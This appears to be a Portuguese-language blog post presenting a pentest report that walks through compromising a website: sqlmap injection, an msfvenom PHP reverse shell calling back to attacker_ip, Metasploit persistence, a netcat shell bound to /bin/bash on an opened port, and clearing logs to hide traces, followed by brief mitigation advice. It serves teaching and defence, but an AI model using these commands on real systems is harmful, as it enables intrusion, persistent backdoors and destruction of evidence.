Pular para o conteúdo principal

Destaques

Relatório de Vulnerabilidade: Bancos de Dados e Big Data

  Introdução Neste relatorio eu analisei algumas vulnerabilidade em bancos de dados e ambientes de big datas, onde muitas empresas nao tem uma segurança adequada. Esses sistemas armazena grande volume de dados sensiveis e por isso vira alvo facil de atacantes. Objetivo O objetivo desse teste foi indentificar falhas de segurança em banco de dados e tambem em plataformas de big data, avaliando riscos, impacto e meios de atack mais comuns. Principais Vulnerabilidades Encontradas Credenciais fracas: varios sistemas utilizavam senhas simples ou padrão (admin/admin), facilitando acessos indevidos. Falta de criptografia: dados sensiveis estava armazenado sem criptografia, permitindo leitura direta caso haja acesso. Exposição de portas: portas como 3306 (MySQL), 5432 (PostgreSQL) e 27017 (MongoDB) estavam aberta para internet. Configuração incorreta: servidores mal configurado permitindo acesso remoto sem restrição ou whitelist. Backup exposto: arquivos de backup (.sql, .bak) disponivel pu...

Relatório Técnico: Tipos de Redes, Portas Lógicas e suas Vulnerabilidades


1. Introdução

Este relatório descreve um cenário de pentest onde um site é invadido, uma backdoor é instalada para acesso remoto e uma porta secundária é explorada para manter o acesso persistente. O objetivo é identificar vulnerabilidades, demonstrar como elas podem ser exploradas e fornecer recomendações para mitigação.


2. Metodologia de Pentest

2.1. Coleta de Informações

Objetivo: Identificar o site e suas tecnologias.

Ferramentas: Nmap, WhatWeb, Wappalyzer.


Passos:

Realizar uma varredura de portas para identificar serviços ativos.

Identificar o sistema operacional e tecnologias utilizadas (ex: Apache, PHP, MySQL).


2.2. Exploração de Vulnerabilidades

Objetivo: Identificar e explorar vulnerabilidades para obter acesso inicial.

Ferramentas: Metasploit, SQLmap, Burp Suite.


Passos:

Testar vulnerabilidades comuns, como Injeção de SQL ou XSS.

Explorar a vulnerabilidade para obter acesso ao servidor.


2.3. Criação de Backdoor

Objetivo: Instalar uma backdoor para acesso remoto.

Ferramentas: Metasploit, Netcat, Shells web.


Passos:

Utilizar uma vulnerabilidade para carregar uma shell reversa.

Configurar a backdoor para persistência.


2.4. Exploração de Porta Secundária

Objetivo: Manter o acesso ao sistema através de uma porta secundária.

Ferramentas: SSH, Netcat.


Passos:

Abrir uma porta secundária no firewall.

Configurar um serviço para escutar na porta secundária.


2.5. Limpeza de Rastros

Objetivo: Remover evidências da invasão.

Ferramentas: Comandos do sistema operacional.


Passos:

Limpar logs de acesso.

Remover arquivos temporários.


3. Exemplo Prático de Pentest

3.1. Coleta de Informações

Varredura de Portas:


(nmap -sV -p- target.com)

Identifica serviços ativos e versões.

Identificação de Tecnologias:



(whatweb target.com)

Identifica o servidor web e tecnologias utilizadas.


3.2. Exploração de Vulnerabilidades

Injeção de SQL:


Utilizar o SQLmap para explorar uma vulnerabilidade de injeção de SQL.


(sqlmap -u "http://target.com/login" -- )(data="username=admin&password=pass" --dbs)

Extrair dados do banco de dados.


Upload de Arquivo Malicioso:

Explorar uma falha de upload para carregar uma shell web.



(msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip) (LPORT=4444 -f raw > shell.php)

Fazer upload do arquivo shell.php para o servidor.


3.3. Criação de Backdoor

Shell Reversa:


Configurar o Metasploit para receber a conexão reversa.


(msfconsole)

(use exploit/multi/handler)

(set payload php/meterpreter/reverse_tcp)

(set LHOST attacker_ip)

(set LPORT 4444)

(exploit)


Acessar o arquivo shell.php no servidor para iniciar a conexão reversa.


Persistência:

Criar um serviço para manter o acesso.

(meterpreter > run persistence -X -i 60 -p 4444 -r attacker_ip)


3.4. Exploração de Porta Secundária

Abrir Porta Secundária:

Abrir uma porta no firewall.

(iptables -A INPUT -p tcp --dport 2222 -j ACCEPT)


Configurar Serviço:

Utilizar o Netcat para escutar na porta secundária.

(nc -lvp 2222 -e /bin/bash)


3.5. Limpeza de Rastros

Limpar Logs:

(meterpreter > clearev)


Remover Arquivos Temporários:

(rm -rf /tmp/shell.php)


4. Vulnerabilidades Identificadas

4.1. Injeção de SQL

Descrição: Falha que permite a execução de comandos SQL maliciosos.

Impacto: Acesso não autorizado a dados sensíveis.


4.2. Upload de Arquivo Malicioso

Descrição: Falha que permite o upload de arquivos maliciosos.

Impacto: Execução de código malicioso no servidor.


4.3. Falhas de Configuração de Firewall

Descrição: Configurações inadequadas de firewall.

Impacto: Acesso não autorizado através de portas secundárias.


5. Recomendações de Mitigação

5.1. Validação de Entradas

Validar e sanitizar todas as entradas de usuário.

5.2. Restrição de Uploads

Validar e restringir tipos de arquivos permitidos.

5.3. Configuração Adequada de Firewall

Configurar o firewall para bloquear portas desnecessárias.

5.4. Monitoramento de Logs

Monitorar logs de acesso para detectar atividades suspeitas.

5.5. Atualização de Software

Manter o software e bibliotecas atualizados.


6. Conclusão

Este relatório demonstrou como um site pode ser invadido, uma backdoor pode ser instalada e uma porta secundária pode ser explorada para manter o acesso persistente. A identificação e correção dessas vulnerabilidades são essenciais para proteger os sites e os dados dos usuários. Recomenda-se a implementação de práticas de segurança robustas, como validação de entradas, restrição de uploads e configuração adequada de firewalls.


Copyright © 2025 (@zxyurikauan). Todos os direitos reservados 


Comentários

Postagens mais visitadas